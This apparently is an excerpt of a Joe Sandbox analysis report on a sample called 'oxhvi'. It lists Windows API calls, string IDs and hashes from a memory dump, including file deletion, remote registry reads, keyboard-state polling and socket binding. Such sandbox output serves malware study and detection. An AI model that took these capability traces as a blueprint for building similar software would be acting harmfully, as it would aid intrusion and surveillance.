• CreateFileW.KERNELBASE(00000000,00000000,?,00570AA4,?,?,00000000,?,00570AA4,00000000,0000000C), ref: 00570757
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• GetFileAttributesW.KERNELBASE(?,0059D755), ref: 0059E9C6
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
  • Part of subcall function 0059DB69: FindFirstFileW.KERNELBASE(?,?), ref: 0059DBE0
  • Part of subcall function 0059DB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 0059DC30
  • Part of subcall function 0059DB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 0059DC41
  • Part of subcall function 0059DB69: FindClose.KERNEL32(00000000), ref: 0059DC58
• GetLastError.KERNEL32 ref: 005A6583
Similarity
• API ID: FileFind$CloseDeleteErrorFirstLastNext
• String ID:
• API String ID: 2191629493-0
APIs
• CloseHandle.KERNELBASE(?,?,00000000,00573A1C), ref: 00537973
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 005AA11B
• FindNextFileW.KERNEL32(00000000,?), ref: 005AA176
• FindClose.KERNEL32(00000000), ref: 005AA181
• FindFirstFileW.KERNEL32(*.*,?), ref: 005AA19D
• SetCurrentDirectoryW.KERNEL32(?), ref: 005AA1ED
• SetCurrentDirectoryW.KERNEL32(005F7B94), ref: 005AA20B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 005AA215
• FindClose.KERNEL32(00000000), ref: 005AA222
• FindClose.KERNEL32(00000000), ref: 005AA232
  • Part of subcall function 0059E2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0059E2C9
Strings
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
APIs
  • Part of subcall function 005BD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005BC00D,?,?), ref: 005BD314
  • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD350
  • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD3C7
  • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD3FD
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005BC89D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 005BC908
• RegCloseKey.ADVAPI32(00000000), ref: 005BC92C
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 005BC98B
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 005BCA46
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 005BCAB3
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 005BCB48
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 005BCB99
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 005BCC42
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 005BCCE1
• RegCloseKey.ADVAPI32(00000000), ref: 005BCCEE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3102970594-0
                                                                                                                                                      • Opcode ID: c299e361ec8a8b8b352935d6b2a4c756e565a5f156a78aa4e22022cff13a6954
                                                                                                                                                      • Instruction ID: 92a10f2489c81d78c923472ae16f21e3f10df969665c1105e6c21514f187bb2d
                                                                                                                                                      • Opcode Fuzzy Hash: c299e361ec8a8b8b352935d6b2a4c756e565a5f156a78aa4e22022cff13a6954
                                                                                                                                                      • Instruction Fuzzy Hash: AD023B716042019FD714CF28C895E6ABFE5BF88314F18849DF85ADB2A2DB31ED46CB91
APIs
• GetKeyboardState.USER32(?), ref: 0059A572
• GetAsyncKeyState.USER32(000000A0), ref: 0059A5F3
• GetKeyState.USER32(000000A0), ref: 0059A60E
• GetAsyncKeyState.USER32(000000A1), ref: 0059A628
• GetKeyState.USER32(000000A1), ref: 0059A63D
• GetAsyncKeyState.USER32(00000011), ref: 0059A655
• GetKeyState.USER32(00000011), ref: 0059A667
• GetAsyncKeyState.USER32(00000012), ref: 0059A67F
• GetKeyState.USER32(00000012), ref: 0059A691
• GetAsyncKeyState.USER32(0000005B), ref: 0059A6A9
• GetKeyState.USER32(0000005B), ref: 0059A6BB
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 481992e9c6e56d827dd784cd2c35bffe4a79fe54d71812ccc4f875e270f79cf2
• Instruction ID: e39a8f69d6e6daf360f4acde2459eaaadeda96f9d8df3956591933b67e21a21e
• Opcode Fuzzy Hash: 481992e9c6e56d827dd784cd2c35bffe4a79fe54d71812ccc4f875e270f79cf2
• Instruction Fuzzy Hash: 40417474A04BC96EFF319A64C8147A5BEA0BB21344F09805DD5C64A5C2EBA499C8CBF7
APIs
• CoInitialize.OLE32 ref: 005B40D1
• CoUninitialize.OLE32 ref: 005B40DC
• CoCreateInstance.OLE32(?,00000000,00000017,005D0B44,?), ref: 005B4136
• IIDFromString.OLE32(?,?), ref: 005B41A9
• VariantInit.OLEAUT32(?), ref: 005B4241
• VariantClear.OLEAUT32(?), ref: 005B4293
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 636576611-1287834457
• Opcode ID: c006d3001c4132b7e0743a77e09e8350e9063691fce786b66cb90c02c5b1f599
• Instruction ID: dd388f87e9bafb6c958ed97303490a5f4d8882577af09023ed1dfeb396ad5ae3
• Opcode Fuzzy Hash: c006d3001c4132b7e0743a77e09e8350e9063691fce786b66cb90c02c5b1f599
• Instruction Fuzzy Hash: 4B617D746047019FD720DF68D889BAABFE8BF99714F000819F9819B292D770ED48DF92
APIs
  • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 005AA4D5
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 005AA5E8
  • Part of subcall function 005A41CE: GetInputState.USER32 ref: 005A4225
  • Part of subcall function 005A41CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005A42C0
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 005AA505
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 005AA5D2
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
• String ID: *.*
• API String ID: 1972594611-438819550
• Opcode ID: 239e68cb577843e8e51857eef688a8077ef0e307cecf41e54afbe6f33fdabf4c
• Instruction ID: c69b7bbf71a3fbdd36e87cc7871ff409f8e140a14d6bb897ed253a43733cd166
• Opcode Fuzzy Hash: 239e68cb577843e8e51857eef688a8077ef0e307cecf41e54afbe6f33fdabf4c
• Instruction Fuzzy Hash: EA416E7190020AAFDF55DFA4C849AEEBFB4FF5A310F14446AE805A2191E7309E44CB61
APIs
• DefDlgProcW.USER32(?,?), ref: 005322EE
• GetSysColor.USER32(0000000F), ref: 005323C3
• SetBkColor.GDI32(?,00000000), ref: 005323D6
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Color$Proc
• String ID:
• API String ID: 929743424-0
• Opcode ID: db237a90d7c2f38ff2e428241bcac08cd09aaedd2b8218f09a4cb6239da2f965
• Instruction ID: 732a903839bfc99233678bf608f090e958a023d9eaedf513f66bc743d9c6d963
• Opcode Fuzzy Hash: db237a90d7c2f38ff2e428241bcac08cd09aaedd2b8218f09a4cb6239da2f965
• Instruction Fuzzy Hash: 4381D1B0204859BEE72D6A3D9C9CE7F2F5DFB82310F154919F142C6696CA298F01F276
APIs
  • Part of subcall function 005B39AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 005B39D7
  • Part of subcall function 005B39AB: _wcslen.LIBCMT ref: 005B39F8
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 005B21BA
• WSAGetLastError.WSOCK32 ref: 005B21E1
• bind.WSOCK32(00000000,?,00000010), ref: 005B2238
• WSAGetLastError.WSOCK32 ref: 005B2243
• closesocket.WSOCK32(00000000), ref: 005B2272
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
• Opcode ID: 3d37d0776302498163cf07ca399a02e41269f6be20003906c70cd6161d8befd6
• Instruction ID: 2475cac3f6a6a9f80a25154c58e26540940532c88f90a485a1816646d9bc033e
• Opcode Fuzzy Hash: 3d37d0776302498163cf07ca399a02e41269f6be20003906c70cd6161d8befd6
• Instruction Fuzzy Hash: A951B275A00611AFD710AF24C88AF6A7BE5BB84718F04805CF915AF3D3C670ED42CBA1
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 292994002-0
                                                                                                                                                      • Opcode ID: 2efee74eb46349743e78fd846bb70fff95056544d643855402978eb10d7c7e2a
                                                                                                                                                      • Instruction ID: 268b6c53c84b17b127c5c2741b2813b71f52cd49754e33e6279f4b3cc568f7a7
                                                                                                                                                      • Opcode Fuzzy Hash: 2efee74eb46349743e78fd846bb70fff95056544d643855402978eb10d7c7e2a
                                                                                                                                                      • Instruction Fuzzy Hash: 8E219C313006418FD7208F5AD858F1A7FA5BF94324F18846CE84ACB251DB35EC82DBA0
                                                                                                                                                      APIs
                                                                                                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0059EC19
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: mouse_event
• String ID: DOWN
• API String ID: 2434400541-711622031
• Opcode ID: 5d5f45665739958e33b9055c834b9a4f7d22e0ec3a3b4d89d367cfbbbaa34cbe
• Instruction ID: b5799172e2b534e6a15917009256918619b7f724268fe3f57351e66304cffef2
• Opcode Fuzzy Hash: 5d5f45665739958e33b9055c834b9a4f7d22e0ec3a3b4d89d367cfbbbaa34cbe
• Instruction Fuzzy Hash: F3E08C361DDB263CBE0421187D07DF60B8CAF26339B510247FC40E51C1ED885D8668A8
APIs
• CharUpperBuffW.USER32(?,?), ref: 005C0C44
• _wcslen.LIBCMT ref: 005C0C7E
• _wcslen.LIBCMT ref: 005C0CE8
• _wcslen.LIBCMT ref: 005C0D50
• _wcslen.LIBCMT ref: 005C0DD4
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 005C0E24
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005C0E63
  • Part of subcall function 0054FD60: _wcslen.LIBCMT ref: 0054FD6B
  • Part of subcall function 00592ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00592AE8
  • Part of subcall function 00592ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00592B1A
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 1103490817-719923060
• Opcode ID: ee7f5d2a79b5b90f2375f3e9ba502807cd48a3cd9866e8c193aa9efab4b4b9e4
• Instruction ID: 84f059095063419a1b681571ccba65364adc3a54f149a4e735d3251f8c774829
• Opcode Fuzzy Hash: ee7f5d2a79b5b90f2375f3e9ba502807cd48a3cd9866e8c193aa9efab4b4b9e4
• Instruction Fuzzy Hash: FBE1AB31208606CFCB14EF68C445E7ABBE6FF98314B14495CF896AB2A2DB30ED45CB51
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0053259A
• GetSystemMetrics.USER32(00000007), ref: 005325A2
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005325CD
• GetSystemMetrics.USER32(00000008), ref: 005325D5
• GetSystemMetrics.USER32(00000004), ref: 005325FA
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00532617
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00532627
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0053265A
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0053266E
• GetClientRect.USER32(00000000,000000FF), ref: 0053268C
• GetStockObject.GDI32(00000011), ref: 005326A8
• SendMessageW.USER32(00000000,00000030,00000000), ref: 005326B3
  • Part of subcall function 005319CD: GetCursorPos.USER32(?), ref: 005319E1
  • Part of subcall function 005319CD: ScreenToClient.USER32(00000000,?), ref: 005319FE
  • Part of subcall function 005319CD: GetAsyncKeyState.USER32(00000001), ref: 00531A23
  • Part of subcall function 005319CD: GetAsyncKeyState.USER32(00000002), ref: 00531A3D
• SetTimer.USER32(00000000,00000000,00000028,0053199C), ref: 005326DA
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 1a4f2a993513d00141c78417097222d4da65a5395fc02b8a078eef0460af7809
• Instruction ID: 64beb548866d48ebbf9e916a900d53847bf58491182f5677465229357267ff1a
• Opcode Fuzzy Hash: 1a4f2a993513d00141c78417097222d4da65a5395fc02b8a078eef0460af7809
• Instruction Fuzzy Hash: 9EB18C71A4020A9FDB14DFA8DC59FAE7BB5FB48314F108229FA19EB290D770D940DB61
APIs
• _wcslen.LIBCMT ref: 005C8CB9
• _wcslen.LIBCMT ref: 005C8CCD
• _wcslen.LIBCMT ref: 005C8CF0
• _wcslen.LIBCMT ref: 005C8D13
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 005C8D51
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005C6551), ref: 005C8DAD
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005C8DE6
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 005C8E29
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005C8E60
• FreeLibrary.KERNEL32(?), ref: 005C8E6C
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 005C8E7C
• DestroyIcon.USER32(?,?,?,?,?,005C6551), ref: 005C8E8B
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 005C8EA8
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 005C8EB4
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
• String ID: .dll$.exe$.icl$Qe\
• API String ID: 799131459-598721527
• Opcode ID: 823370932fc043b098e67ad7962c195979a87329ecb49e3492b3e8979cf99482
• Instruction ID: cb74119eac173d77bea4d012dc1b529563980e61c1933d0b2277cf54c722f575
• Opcode Fuzzy Hash: 823370932fc043b098e67ad7962c195979a87329ecb49e3492b3e8979cf99482
• Instruction Fuzzy Hash: 3A61EB7160061ABEEB149FA4CC45FBE7BBCBB18711F10451AF916D60D0DBB4AA84DBA0
                                                                                                                                                      APIs
                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 005A4852
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A485D
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A48B4
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A48F2
                                                                                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 005A4930
                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005A4978
                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005A49B3
                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005A49E1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                      • API String ID: 1839972693-4113822522
                                                                                                                                                      • Opcode ID: 664cb27b08c8b38e8b495dde7c90691cbf143a23a6acd201e5a9e0dc5e019859
                                                                                                                                                      • Instruction ID: cf486a05806e01160f1cc280c83aff9c3e7e59480fd900bd8f406e599517478f
                                                                                                                                                      • Opcode Fuzzy Hash: 664cb27b08c8b38e8b495dde7c90691cbf143a23a6acd201e5a9e0dc5e019859
                                                                                                                                                      • Instruction Fuzzy Hash: B071BA326086069FC710EF64C88196EBBE4FFE9758F00492CF892972A1EB74DD45CB91
                                                                                                                                                      APIs
                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 005962BD
                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 005962CF
                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 005962E6
                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 005962FB
                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00596301
                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00596311
                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00596317
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00596338
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00596352
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0059635B
                                                                                                                                                      • _wcslen.LIBCMT ref: 005963C2
                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 005963FE
                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00596404
                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0059640B
                                                                                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00596462
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0059646F
                                                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00596494
                                                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 005964BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 895679908-0
                                                                                                                                                      • Opcode ID: 2c306f13fffe8ff419964bf2bd38d7f574b232b2f2d785f03ec2476c57f1ecb9
                                                                                                                                                      • Instruction ID: 2c25308f1a4e3f6f73e928ff4240826cc14b440520314394ca2322c032dbad7d
                                                                                                                                                      • Opcode Fuzzy Hash: 2c306f13fffe8ff419964bf2bd38d7f574b232b2f2d785f03ec2476c57f1ecb9
                                                                                                                                                      • Instruction Fuzzy Hash: 78716C31900605AFDF20DFA8CE89EAEBBF5FF48705F104928E586A35A0D775E948DB50
                                                                                                                                                      APIs
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 005B0784
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 005B078F
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 005B079A
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 005B07A5
